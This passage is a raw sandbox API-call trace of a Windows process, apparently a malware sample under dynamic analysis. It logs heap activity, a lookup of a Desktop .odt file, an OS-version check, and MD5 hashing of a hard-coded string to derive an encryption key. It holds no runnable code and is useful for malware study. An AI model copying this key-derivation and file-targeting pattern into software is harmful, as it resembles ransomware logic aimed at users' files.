[0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0100.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0100.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0100.217] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0100.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0100.217] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0100.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.218] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/ERgdUGLd4HevVs5.odt", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 0x9a3b80 [0100.218] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0100.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.218] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.218] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.218] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.218] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.219] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0100.219] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0100.219] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0100.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0100.219] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.219] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7060, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0100.219] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf088) returned 1 [0100.220] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0100.220] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0100.220] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.220] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.220] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0100.220] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0100.220] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.220] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.220] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.220] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0100.300] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0100.300] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0100.301] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.301] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.301] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.301] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9cd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0100.301] CryptCreateHash (in: hProv=0x9bf088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0100.301] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0100.301] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.301] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.301] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ef8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0100.301] CryptHashData (hHash=0x9a3b80, pbData=0x2a71af8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0100.301] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.302] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.302] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0100.302] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0100.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9dd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0100.302] CryptDeriveKey (in: hProv=0x9bf088, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4a00) returned 1 [0100.302] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0100.302] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0100.302] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0100.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7000, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0100.302] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0100.302] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0100.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0100.302] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0100.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0100.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0100.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0100.303] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0100.303] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0100.304] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0100.304] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0100.305] HeapFree 